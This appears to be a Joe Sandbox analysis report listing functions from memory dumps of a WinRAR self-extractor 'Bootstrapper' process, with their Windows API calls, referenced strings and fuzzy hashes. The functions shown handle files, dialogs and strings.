Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Malloc
String ID: ($2$A
API String ID: 2696272793-112831991
Opcode ID: 29681a57fb0935e744a9ad1c5ada26a7c9a8733d874ee5edb8d77c1c4e76c39d
Instruction ID: e514d2e0fefb66c1c33729b1e2a86fcd8dab928c43368b7b923574acdd7e5e86
Opcode Fuzzy Hash: 29681a57fb0935e744a9ad1c5ada26a7c9a8733d874ee5edb8d77c1c4e76c39d
Instruction Fuzzy Hash: 61011771901229AFCF14CFA5E848AEFBBF8AF09354B10416AE906F7250D7749A44DFA4

Function 00E1DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00E1DD31
REPLACEFILEDLG, xrefs: 00E1DD1C, 00E1DD50

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 9ddfa4d357152d78d93ba3164bf80fe68fbdc289b0ec8a42c9fe7af356bf000a
Instruction ID: e64a28c10fd29ced0e21770c629cc0cf1702c3070495502f4457533ec6951b4d
Opcode Fuzzy Hash: 9ddfa4d357152d78d93ba3164bf80fe68fbdc289b0ec8a42c9fe7af356bf000a
Instruction Fuzzy Hash: E201DE3AA08245AFCB108F66FC049DA7BA8E74A384F001426F911F2230C6308899DBA0

Function 00E01316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00E0E2E8: _swprintf.LIBCMT ref: 00E0E30E
Part of subcall function 00E0E2E8: _strlen.LIBCMT ref: 00E0E32F
Part of subcall function 00E0E2E8: SetDlgItemTextW.USER32(?,00E3E274,?), ref: 00E0E38F
Part of subcall function 00E0E2E8: GetWindowRect.USER32(?,?), ref: 00E0E3C9
Part of subcall function 00E0E2E8: GetClientRect.USER32(?,?), ref: 00E0E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

Strings

, xrefs: 00E0134A
0, xrefs: 00E01319

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: $0
API String ID: 2622349952-2895914132
Opcode ID: 274d4ab2dc4b4bd8a5261af823dd5faea9201ab62726ef83829977dedb69971a
Instruction ID: 05df2e21b3ee83ec7c05bc67f8c73dd36f05f0b53d96e5ecb58ff062740d6408
Opcode Fuzzy Hash: 274d4ab2dc4b4bd8a5261af823dd5faea9201ab62726ef83829977dedb69971a
Instruction Fuzzy Hash: 87F0AF3010438CABDF150F619C0EBEE3B98AF41388F05A694FC44785E2CB78C9D4EA10

Function 00E29A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E29AA9
__alldvrm.LIBCMT ref: 00E29CAA
__alldvrm.LIBCMT ref: 00E29CCC

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: 053e8f8b07af1c99a9088ed61b5c3540c8e9d58c9b66472d45262797e6914f94
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 92A15972A043A69FDB15CF28E8927AEFBE5EF51314F18616DE485BB283C2348941C754

Function 00E0A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E07F69,?,?,?), ref: 00E0A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E07F69,?), ref: 00E0A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E07F69,?,?,?,?,?,?,?), ref: 00E0A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00E07F69,?,?,?,?,?,?,?,?,?,?), ref: 00E0A4C6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: cd3b13c5a7789873ffa9ae706864d11acef6ef28bc4d93c04e1a8e9bc5e5c477
Instruction ID: 6dd2ec340a5285cffe48ab6d09b153ebef628426ec3cefea8a4bb8ef048129ca
Opcode Fuzzy Hash: cd3b13c5a7789873ffa9ae706864d11acef6ef28bc4d93c04e1a8e9bc5e5c477
Instruction Fuzzy Hash: D741A2312483899AD731DF24DC45FEEBBE49B85704F08092DB5E1E31D1D6A89A88DB53

Function 00E2C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E291E0,?,00000000,?,00000001,?,?,00000001,00E291E0,?), ref: 00E2C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E2CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E26CBE,?), ref: 00E2CA70
__freea.LIBCMT ref: 00E2CA79

Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E2CA2C,00000000,?,00E26CBE,?,00000008,?,00E291E0,?,?,?), ref: 00E28E38

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ddcaae119a261f632fc2a66f58585a80c14d503989c6e7f21f3fb936ff84ffea
Instruction ID: 5730a709635ba87c6a3c823ced2a9ffc8d3c9b0e0edacd5675ab229738fdd608
Opcode Fuzzy Hash: ddcaae119a261f632fc2a66f58585a80c14d503989c6e7f21f3fb936ff84ffea
Instruction Fuzzy Hash: CC31BDB2A0022AABDB24CF65EC45DEE7BA5EF01310B144228FC05F6290EB35CD94CB90

Function 00E1A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E1A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E1A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E1A683
ReleaseDC.USER32(00000000,00000000), ref: 00E1A691

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b32c456b5ce347d5459141963574d976ed64c07538ce5c038302776d3bc985e9
Instruction ID: 02c3fe60077a340795791a40cdb6146af3d87d2c8a033c91eebcecfebe0deb53
Opcode Fuzzy Hash: b32c456b5ce347d5459141963574d976ed64c07538ce5c038302776d3bc985e9
Instruction Fuzzy Hash: 07E08C35A42721FFC2A01B72BD0DB8B3E14AB16B92F000100FA05B6190DBA48A0C8BA1

Function 00E1D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00E1D11B

Strings

.lnk, xrefs: 00E1D2F7, 00E1D307
d, xrefs: 00E1D3C5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$d
API String ID: 2691759472-761835416
Opcode ID: e74de5efafcfc98b7af062c814cb63a80b7786a5ff8ca9000d31168b90e1e1b2
Instruction ID: 5c2fdcc151f054314824228d4f78657a5df9ac3743dc4abb31536cfac819a437
Opcode Fuzzy Hash: e74de5efafcfc98b7af062c814cb63a80b7786a5ff8ca9000d31168b90e1e1b2
Instruction Fuzzy Hash: 9EA16F72904229AADF24DBA0DD45EFA73FCAF44304F08A5A2B509F3151EE749BC4CB61

Function 00E075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E075E3

Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0

Part of subcall function 00E0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E0777F

Part of subcall function 00E0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
Part of subcall function 00E0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532

Strings

:, xrefs: 00E07654

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: e3e4dfde3c9a8ceef4ec2b2faa18613110d65bf4f525c88b9994a25cf6455893
Instruction ID: fa96bb53d17bcb2317064c0e362fdbd29edeadaf4c4665ca6437968e7a459501
Opcode Fuzzy Hash: e3e4dfde3c9a8ceef4ec2b2faa18613110d65bf4f525c88b9994a25cf6455893
Instruction Fuzzy Hash: 27416E71900258A9EB25EB64DC59EEEB3B8AF51300F005096B64AB20D3DB745FC9CF70

Function 00E0B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00E0B438
_wcschr.LIBVCRUNTIME ref: 00E0B478

Strings

*, xrefs: 00E0B38A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: a2243775176c0126d61a66b9237ee533b4a9843288941a761c03492a650e2667
Instruction ID: 14c3f130ec0d85f71344d7eee18cdb74d7ee20dd829d9841f5b8885d663b0db8
Opcode Fuzzy Hash: a2243775176c0126d61a66b9237ee533b4a9843288941a761c03492a650e2667
Instruction Fuzzy Hash: 093160325443119ACB30AE549902A7B73E4FF90B18F15A01DF9A4B71C3F7668FC59361

Function 00E1B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E1B4E3
_wcslen.LIBCMT ref: 00E1B4FE

Strings

}, xrefs: 00E1B4D6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 11b67c9892b6e8bc9242b360b55ae64e247cab854ef03ed59f6af0ff57cc7752
Instruction ID: d7aa9d14f563b4078e79ff944e2f6892bddc08346aad35349c48819d5f717530
Opcode Fuzzy Hash: 11b67c9892b6e8bc9242b360b55ae64e247cab854ef03ed59f6af0ff57cc7752
Instruction Fuzzy Hash: 6421057290431A5AD731EB64E845FABB3EEDF91758F04242AF580E3141EB64DDC883A2

Function 00E0F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00E0F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E0F2E4
Part of subcall function 00E0F2C5: GetProcAddress.KERNEL32(00E481C8,CryptUnprotectMemory), ref: 00E0F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00E0F33E), ref: 00E0F3D2

Strings

CryptUnprotectMemory failed, xrefs: 00E0F3CA
CryptProtectMemory failed, xrefs: 00E0F389

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 94b2498c9635d0dd7d8739df34e9aefa098e16462992d465aa85fde5b4be7f8b
Instruction ID: 9cb644048492aa20c2dd6bec15cde4a6d351920e970e2087145907c6a35a3246
Opcode Fuzzy Hash: 94b2498c9635d0dd7d8739df34e9aefa098e16462992d465aa85fde5b4be7f8b
Instruction Fuzzy Hash: 4B1129316012296FDF25AF31ED45A6E3B94FF00774F045126FC417B6E1DA389DA68690

Function 00E1101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00E11160,?,00000000,00000000), ref: 00E11043
SetThreadPriority.KERNEL32(?,00000000), ref: 00E1108A

Part of subcall function 00E06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E06C54

Part of subcall function 00E06DCB: _wcschr.LIBVCRUNTIME ref: 00E06E0A
Part of subcall function 00E06DCB: _wcschr.LIBVCRUNTIME ref: 00E06E19

Strings

CreateThread failed, xrefs: 00E1104F

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: c5d6ccdf57cb3705d0a11edb5eee7b6eacc8a315d08db7ce409e35315b379f88
Instruction ID: 3d366d0c968d54b6f8fc336ca6f4dda46e7a719fffd7e0ef6b1b8d96b11bd034
Opcode Fuzzy Hash: c5d6ccdf57cb3705d0a11edb5eee7b6eacc8a315d08db7ce409e35315b379f88
Instruction Fuzzy Hash: 9001DBB53443096FD734AE64AC96FB6B798EB44751F10106EF687761C0CAA168C58624

Function 00E0C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00E0C080

Strings

?*<>|", xrefs: 00E0C06D, 00E0C07F
<9, xrefs: 00E0C076

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcschr
String ID: <9$?*<>|"
API String ID: 2691759472-2723886458
Opcode ID: 81f8a292400ef7eb47c38ef0f3c9f67cb9ab462d9889ff99d50c7ada1ee9ef93
Instruction ID: cc6ef6d7618b694878ecd68248c010cd63abb52023b873b8c337930a5dce5c03
Opcode Fuzzy Hash: 81f8a292400ef7eb47c38ef0f3c9f67cb9ab462d9889ff99d50c7ada1ee9ef93
Instruction Fuzzy Hash: 71F0A453A45702D5C7301F28A811732F3E4EFD5738F342A1EE5C5E72D2E6A188C0D666

Function 00E1DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E1DBAC

Strings

, xrefs: 00E1DB9F
Software\WinRAR SFX, xrefs: 00E1DB95

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$
API String ID: 176396367-3959033184
Opcode ID: b7bd1bfe6542c57a9b0d40a513dfeb1b9a11a0ba751e5c3845f7f3c2854ffbfe
Instruction ID: 719852805a90ffdb67dc680adeb45f0089268a6cd6859b4622adde2b8535a7c5
Opcode Fuzzy Hash: b7bd1bfe6542c57a9b0d40a513dfeb1b9a11a0ba751e5c3845f7f3c2854ffbfe
Instruction Fuzzy Hash: 2E012175544258BEEB219BA1EC09FDF7FBDEB05794F001051B549B5061D7F04ACCCAA1

Function 00E1AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2

Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E11FE5
Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E11FF6
Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E12006
Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E12014
Part of subcall function 00E11FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E0B371,?,?,00000000,?,?,?), ref: 00E1202F

Part of subcall function 00E1AC04: SetCurrentDirectoryW.KERNELBASE(?,00E1AE72,C:\Users\user\Desktop,00000000,00E4946A,00000006), ref: 00E1AC08

_wcslen.LIBCMT ref: 00E1AE8B

Strings

C:\Users\user\Desktop, xrefs: 00E1AE68
<, xrefs: 00E1AEC4

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <$C:\Users\user\Desktop
API String ID: 521417927-1688363908
Opcode ID: 9a2ade512807892ae6d9ebcb3b7c27c52241005d11ef5d4714296917f6b70828
Instruction ID: e12af16e4eac8af48d463bc78a30b2e2e159834e4def307792a6b1a400632858
Opcode Fuzzy Hash: 9a2ade512807892ae6d9ebcb3b7c27c52241005d11ef5d4714296917f6b70828
Instruction Fuzzy Hash: 69017171D00218A9DF10ABA4ED0AEDF73FCAF48304F041465F605F3192E6B8A6C88AA1

Function 00E2BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E297E5: GetLastError.KERNEL32(?,00E41030,00E24674,00E41030,?,?,00E23F73,00000050,?,00E41030,00000200), ref: 00E297E9
